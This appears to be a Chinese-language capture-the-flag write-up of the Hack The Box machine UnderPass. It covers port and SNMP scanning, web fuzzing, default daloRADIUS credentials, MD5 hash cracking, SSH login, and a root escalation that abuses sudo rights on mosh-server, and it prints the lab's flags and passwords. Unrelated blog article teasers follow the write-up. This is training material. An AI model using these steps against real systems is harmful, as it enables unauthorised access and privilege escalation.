HTB:UnderPass[WriteUP]

embedded/2025/2/5 3:47:40/

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务扫描

使用snmpwalk枚举靶机snmp服务信息

使用feroxbuster对靶机/daloradius路径FUZZ

使用ffuf对该路径再次FUZZ

使用Google检索该WebAPP默认凭证

边界突破

使用上述凭证登入/operators后台

将密码哈希扔进CrackStation尝试解密

使用ssh通过上述凭证登录靶机

权限提升

查看可sudo执行的文件

我尝试查询mosh的使用手册

配合sudo执行服务端文件尝试构造命令提权


连接至HTB服务器并启动靶机

分配IP:10.10.16.22

靶机IP:10.10.11.48

靶机Domain:underpass.htb


信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a underpass.htb -r 1-65535 --ulimit 5000 | tee res

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -p22,80 -sCV -Pn underpass.htb

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -p22,80 --script=vuln -O -Pn underpass.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn underpass.htb

使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p161 -sCV -Pn underpass.htb

使用snmpwalk枚举靶机snmp服务信息

snmpwalk -v1 -c public underpass.htb

  • 其中我注意到字符串"UnDerPass.htb is the only daloradius server in the basin!"

使用feroxbuster对靶机/daloradius路径FUZZ

feroxbuster -u 'http://underpass.htb/daloradius' -w ../dictionary/Entire-Dir.txt -t 100 -T 10 -x php asp aspx jsp

  • 由输出结果可见,大部分可访问路径都来自/daloradius/app
使用ffuf对该路径再次FUZZ
ffuf -u 'http://underpass.htb/daloradius/app/FUZZ' -w ../dictionary/Entire-Dir.txt -t 100

  • 使用浏览器访问/users路径

  • 使用浏览器访问/operators路径

使用Google检索该WebAPP默认凭证

账户:administrator

密码:radius


边界突破

使用上述凭证登入/operators后台

  • 点击Management -> List Users可见一份用户凭证

账户:svcMosh

密码哈希:412DD4759978ACFCC81DEAB01B382403

将密码哈希扔进CrackStation尝试解密

账户:svcMosh

密码:underwaterfriends

  • 或者使用john通过字典爆破
john hash --wordlist=../dictionary/rockyou.txt --format=Raw-MD5

使用ssh通过上述凭证登录靶机

ssh svcMosh@underpass.htb

  • /home/svcMosh目录下可见user.txt文件

svcMosh@underpass:~$ ls
user.txt
svcMosh@underpass:~$ pwd
/home/svcMosh
svcMosh@underpass:~$ cat user.txt
8b8b1c902f2bf3f18f74412279ac73b1


权限提升

查看可sudo执行的文件

sudo -l

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

  • 显然mosh-server是服务端文件,则mosh为客户端文件

我尝试查询mosh的使用手册

mosh -h

  • 由输出可知,连接的命令格式:/usr/bin/mosh [options] [--] [user@]host [command...]
配合sudo执行服务端文件尝试构造命令提权
mosh --server="sudo /usr/bin/mosh-server" localhost
  • 成功连接至本地且提权至root用户

  • /root目录下找到root.txt文件

root@underpass:~# pwd
/root
root@underpass:~# ls
root.txt
root@underpass:~# cat root.txt
9be45072db6a8f849186867a1993cab8


http://www.ppmy.cn/embedded/159649.html

相关文章

Python玄学

过年期间无聊的看了看DY直播,也是迷上玄学了。突然想着为啥要自己掐指算,我这🐷脑哪记得到那么多东西啊。然后,就捣鼓捣鼓了一些玩意儿。留个纪念。 注:就是一个玄学推动学习,部分内容不必当真,…

三傻排序的比较(选择,冒泡,插入)

在学习排序算法时,选择排序、冒泡排序和插入排序是最常见的基础排序算法。但是,尽管这些算法看起来非常相似,它们在实际应用中的效率和性能却有所不同。本文将详细比较这三种排序算法的时间复杂度、空间复杂度。 比较总结 排序算法时间复杂…

如何在5步内使用 Spring AI 和 OpenAI 的 DALL-E 3 生成图像

将 Spring AI 与 OpenAI 的 DALL-E 3 集成,以生成图像。轻松设置 Spring Boot、配置 API 集成并自定义设置。 大家好!这是关于 Spring AI 系列介绍文章的第一篇。今天,我们将了解如何通过文本提示轻松生成图片。为此,我们将利用 …

Go优雅实现redis分布式锁

前言 系统为了保证高可用,通常会部署多实例,并且会存在同时对共享资源并发读写,这时候为了保证读写的安全,常规手段是会引入分布式锁,本文将介绍如何使用redis设计一个优雅的Go分布式锁。 设计 redis分布式锁是借助…

Golang —协程池(panjf2000/ants/v2)

Golang —协程池(panjf2000/ants/v2) 1 ants1.1 基本信息1.2 ants 是如何运行的(流程图) 1 ants 1.1 基本信息 代码地址:github.com/panjf2000/ants/v2 介绍:ants是一个高性能的 goroutine 池&#xff0c…

YOLOV11-1:YoloV11-安装和CLI方式训练模型

YoloV11-安装和CLI方式训练模型 1.安装和运行1.1安装的基础环境1.2安装yolo相关组件1.3命令行方式使用1.3.1 训练1.3.2 预测 本文介绍yoloV11的安装和命令行接口 1.安装和运行 1.1安装的基础环境 GPU环境,其中CUDA是12.4版本 1.2安装yolo相关组件 # 克隆github…

深度解析近期爆火的 DeepSeek

最近,AI 领域有个名字频繁出现在大众视野 ——DeepSeek,它的火爆程度就像一颗投入平静湖面的巨石,激起千层浪。今天,咱们就来深入了解一下这个 “AI 新星”。 官网:DeepSeek - 探索未至之境 DeepSeek 是什么 DeepSeek…

C++并发编程指南04

文章目录 共享数据的问题3.1.1 条件竞争双链表的例子条件竞争示例恶性条件竞争的特点 3.1.2 避免恶性条件竞争1. 使用互斥量保护共享数据结构2. 无锁编程3. 软件事务内存(STM) 总结互斥量与共享数据保护3.2.1 互斥量使用互斥量保护共享数据示例代码&…